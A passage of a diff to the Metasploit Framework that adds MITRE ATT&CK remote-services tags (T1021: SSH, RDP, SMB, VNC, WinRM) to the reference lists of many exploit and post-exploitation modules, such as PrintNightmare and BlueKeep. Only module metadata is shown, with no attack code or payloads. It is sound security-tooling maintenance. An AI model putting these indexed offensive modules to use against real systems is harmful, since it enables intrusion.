['URL', 'https://blogs.securiteam.com/index.php/archives/3318'],
|
||||
['URL', 'http://www.palada.net/index.php/2017/07/13/news-2112/'],
|
||||
['URL', 'https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017']
|
||||
['URL', 'https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'Platform' => %w{linux unix win},
|
||||
'Privileged' => false,
|
||||
|
||||
@@ -32,7 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
[ 'BID', '51061' ],
|
||||
[ 'CVE', '2011-4642' ],
|
||||
[ 'URL', 'http://www.splunk.com/view/SP-CAAAGMM' ],
|
||||
[ 'URL', 'http://www.sec-1.com/blog/?p=233' ]
|
||||
[ 'URL', 'http://www.sec-1.com/blog/?p=233' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
|
||||
],
|
||||
'Payload' => {
|
||||
'Space' => 1024,
|
||||
|
||||
@@ -57,7 +57,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
[ 'BID', '36954' ],
|
||||
|
||||
# tomcat docs
|
||||
[ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ]
|
||||
[ 'URL', 'http://tomcat.apache.org/tomcat-5.5-doc/manager-howto.html' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
|
||||
],
|
||||
'Platform' => %w{java linux win}, # others?
|
||||
'Targets' => [
|
||||
|
||||
@@ -31,7 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['URL', 'https://nickbloor.co.uk/2018/01/01/rce-with-bmc-server-automation/'],
|
||||
['URL', 'https://nickbloor.co.uk/2018/01/08/improving-the-bmc-rscd-rce-exploit/'],
|
||||
['CVE', '2016-1542'],
|
||||
['CVE', '2016-1543']
|
||||
['CVE', '2016-1543'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'DisclosureDate' => '2016-03-16',
|
||||
'Privileged' => false,
|
||||
|
||||
@@ -21,7 +21,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
),
|
||||
'Author' => ['Spencer McIntyre', 'Brandon Knight'],
|
||||
'References' => [
|
||||
[ 'CVE', '1999-0502'] # Weak password
|
||||
[ 'CVE', '1999-0502'], # Weak password
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Privileged' => true,
|
||||
|
||||
@@ -34,7 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
[ 'VNC Linux / Unix', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]
|
||||
],
|
||||
'References' => [
|
||||
[ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/']
|
||||
[ 'URL', 'http://www.jedi.be/blog/2010/08/29/sending-keystrokes-to-your-virtual-machines-using-X-vnc-rdp-or-native/'],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ]
|
||||
],
|
||||
'DisclosureDate' => '2015-07-10',
|
||||
'DefaultTarget' => 0,
|
||||
|
||||
@@ -22,7 +22,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'Author' => ['Chokri Hammedi (@blue0x1)'],
|
||||
'References' => [
|
||||
['CVE', '2025-34089'],
|
||||
['PACKETSTORM', '195347']
|
||||
['PACKETSTORM', '195347'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'DisclosureDate' => '2025-05-27',
|
||||
'Platform' => ['unix', 'osx'],
|
||||
|
||||
@@ -23,6 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
[ 'CVE', '2007-0882' ],
|
||||
[ 'OSVDB', '31881'],
|
||||
[ 'BID', '22512' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => %w[solaris unix],
|
||||
|
||||
@@ -23,6 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['CVE', '2001-0797'],
|
||||
['OSVDB', '690'],
|
||||
['BID', '5531'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'Platform' => %w[solaris unix],
|
||||
|
||||
@@ -33,7 +33,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['CVE', '2012-5975'],
|
||||
['EDB', '23082'],
|
||||
['OSVDB', '88103'],
|
||||
['URL', 'https://seclists.org/fulldisclosure/2012/Dec/12']
|
||||
['URL', 'https://seclists.org/fulldisclosure/2012/Dec/12'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'Payload' => {
|
||||
'Compat' =>
|
||||
|
||||
@@ -61,7 +61,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['URL', 'https://github.com/cube0x0/CVE-2021-1675'],
|
||||
['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'],
|
||||
['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'],
|
||||
['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream']
|
||||
['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]
|
||||
],
|
||||
'Notes' => {
|
||||
'AKA' => [ 'PrintNightmare' ],
|
||||
|
||||
@@ -30,7 +30,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
],
|
||||
'References' => [
|
||||
['CVE', '2025-34079'],
|
||||
['EDB', '48360']
|
||||
['EDB', '48360'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'Platform' => %w[windows],
|
||||
'Arch' => [ARCH_X64],
|
||||
|
||||
@@ -29,7 +29,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
['CVE', '2007-1373'],
|
||||
['EDB', '3418']
|
||||
['EDB', '3418'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' => {
|
||||
|
||||
@@ -22,7 +22,8 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
'Author' => [ 'Ben Campbell' ],
|
||||
'References' => [
|
||||
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
|
||||
[ 'OSVDB', '3106']
|
||||
[ 'OSVDB', '3106'],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ]
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'EXITFUNC' => 'thread'
|
||||
|
||||
@@ -37,6 +37,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
|
||||
[ 'OSVDB', '3106'],
|
||||
[ 'URL', 'http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ],
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'EXITFUNC' => 'thread',
|
||||
|
||||
@@ -37,7 +37,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
[ 'EDB', '49587' ],
|
||||
[ 'URL', 'https://www.unifiedremote.com/' ],
|
||||
[ 'URL', 'https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/unified%20remote/unified-remote-rce.py' ],
|
||||
[ 'CVE', '2022-3229' ]
|
||||
[ 'CVE', '2022-3229' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
|
||||
],
|
||||
'Arch' => [ ARCH_X64, ARCH_X86 ],
|
||||
'Platform' => 'win',
|
||||
|
||||
@@ -95,7 +95,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['URL', 'https://github.com/zerosum0x0/CVE-2019-0708'],
|
||||
['URL', 'https://zerosum0x0.blogspot.com/2019/11/fixing-remote-windows-kernel-payloads-meltdown.html'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1059_COMMAND_AND_SCRIPTING_INTERPRETER],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION]
|
||||
['ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_001_REMOTE_DESKTOP_PROTOCOL]
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'RDP_CLIENT_NAME' => 'ethdev',
|
||||
|
||||
@@ -32,7 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'Spencer McIntyre' # RDP DOPU analysis
|
||||
],
|
||||
'References' => [
|
||||
['URL', 'https://github.com/countercept/doublepulsar-detection-script']
|
||||
['URL', 'https://github.com/countercept/doublepulsar-detection-script'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_001_REMOTE_DESKTOP_PROTOCOL]
|
||||
],
|
||||
'DisclosureDate' => '2017-04-14', # Shadow Brokers leak
|
||||
'License' => MSF_LICENSE,
|
||||
|
||||
@@ -44,7 +44,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
[ 'URL', 'https://www.youtube.com/watch?v=RSV3f6aEJFY&t=1865s' ],
|
||||
[ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems' ],
|
||||
[ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems-part-2-windows' ],
|
||||
[ 'URL', 'https://labs.bluefrostsecurity.de/blog/2017/05/11/windows-10-hals-heap-extinction-of-the-halpinterruptcontroller-table-exploitation-technique/' ]
|
||||
[ 'URL', 'https://labs.bluefrostsecurity.de/blog/2017/05/11/windows-10-hals-heap-extinction-of-the-halpinterruptcontroller-table-exploitation-technique/' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'EXITFUNC' => 'thread',
|
||||
|
||||
@@ -30,6 +30,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
[ 'OSVDB', '117423' ],
|
||||
[ 'BID', '72265' ],
|
||||
[ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ],
|
||||
],
|
||||
'DefaultOptions' => {
|
||||
'EXITFUNC' => 'process',
|
||||
|
||||
@@ -47,7 +47,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],
|
||||
['URL', 'https://github.com/countercept/doublepulsar-detection-script'],
|
||||
['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],
|
||||
['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']
|
||||
['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
|
||||
],
|
||||
'DisclosureDate' => '2017-04-14', # Shadow Brokers leak
|
||||
'License' => MSF_LICENSE,
|
||||
|
||||
@@ -83,7 +83,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['MSB', 'MS08-068'],
|
||||
['URL', 'http://blogs.technet.com/swi/archive/2008/11/11/smb-credential-reflection.aspx'],
|
||||
['URL', 'https://en.wikipedia.org/wiki/SMBRelay'],
|
||||
['URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx']
|
||||
['URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]
|
||||
],
|
||||
'Arch' => [ARCH_X86, ARCH_X64],
|
||||
'Platform' => 'win',
|
||||
|
||||
@@ -38,7 +38,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'Privileged' => true,
|
||||
'Payload' => {},
|
||||
'References' => [
|
||||
['URL', 'https://strontium.io/blog/introducing-windows-10-smb-shadow-attack']
|
||||
['URL', 'https://strontium.io/blog/introducing-windows-10-smb-shadow-attack'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]
|
||||
],
|
||||
'Arch' => [ARCH_X86, ARCH_X64],
|
||||
'Platform' => 'win',
|
||||
|
||||
@@ -32,7 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
['OSVDB', '88006'],
|
||||
['BID', '56785'],
|
||||
['URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html'],
|
||||
['URL', 'https://seclists.org/fulldisclosure/2010/Aug/132']
|
||||
['URL', 'https://seclists.org/fulldisclosure/2010/Aug/132'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Privileged' => true,
|
||||
|
||||
@@ -28,6 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [
|
||||
[ 'URL', 'http://msdn.microsoft.com/en-us/library/windows/desktop/aa384426(v=vs.85).aspx' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DefaultOptions' => {
|
||||
|
||||
@@ -37,7 +37,10 @@ class MetasploitModule < Msf::Post
|
||||
stdapi_fs_separator
|
||||
]
|
||||
}
|
||||
}
|
||||
},
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
|
||||
]
|
||||
)
|
||||
)
|
||||
|
||||
|
||||
@@ -23,7 +23,10 @@ class MetasploitModule < Msf::Post
|
||||
'Stability' => [CRASH_SAFE],
|
||||
'SideEffects' => [],
|
||||
'Reliability' => []
|
||||
}
|
||||
},
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ]
|
||||
]
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
@@ -33,7 +33,12 @@ class MetasploitModule < Msf::Post
|
||||
'Stability' => [CRASH_SAFE],
|
||||
'SideEffects' => [],
|
||||
'Reliability' => []
|
||||
}
|
||||
},
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_001_REMOTE_DESKTOP_PROTOCOL ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_005_VNC ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
|
||||
]
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
@@ -51,7 +51,10 @@ class MetasploitModule < Msf::Post
|
||||
stdapi_sys_process_memory_write
|
||||
]
|
||||
}
|
||||
}
|
||||
},
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
|
||||
]
|
||||
)
|
||||
)
|
||||
end
|
||||
|
||||
@@ -28,7 +28,10 @@ class MetasploitModule < Msf::Post
|
||||
'Stability' => [CRASH_SAFE],
|
||||
'SideEffects' => [CONFIG_CHANGES],
|
||||
'Reliability' => []
|
||||
}
|
||||
},
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_001_REMOTE_DESKTOP_PROTOCOL ]
|
||||
]
|
||||
)
|
||||
)
|
||||
|
||||
|
||||
@@ -43,7 +43,10 @@ class MetasploitModule < Msf::Post
|
||||
extapi_pageant_send_query
|
||||
]
|
||||
}
|
||||
}
|
||||
},
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
|
||||
]
|
||||
)
|
||||
)
|
||||
register_options([
|
||||
|
||||
@@ -24,7 +24,8 @@ class MetasploitModule < Msf::Post
|
||||
'SessionTypes' => [ 'meterpreter', 'shell' ],
|
||||
'References' => [
|
||||
['URL', 'https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_overview'],
|
||||
['URL', 'https://github.com/PowerShell/openssh-portable']
|
||||
['URL', 'https://github.com/PowerShell/openssh-portable'],
|
||||
['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
|
||||
],
|
||||
'Notes' => {
|
||||
'Stability' => [CRASH_SAFE],
|
||||
|
||||
@@ -22,7 +22,8 @@ class MetasploitModule < Msf::Post
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' => 'Borja Merino <bmerinofe[at]gmail.com>',
|
||||
'References' => [
|
||||
[ 'URL', 'https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1' ]
|
||||
[ 'URL', 'https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1' ],
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'SessionTypes' => [ 'meterpreter' ],
|
||||
|
||||
@@ -38,7 +38,10 @@ class MetasploitModule < Msf::Post
|
||||
'Stability' => [CRASH_SAFE],
|
||||
'SideEffects' => [ARTIFACTS_ON_DISK],
|
||||
'Reliability' => []
|
||||
}
|
||||
},
|
||||
'References' => [
|
||||
[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
|
||||
]
|
||||
)
|
||||
)
|
||||
|
||||
|
||||
Reference in New Issue
Block a user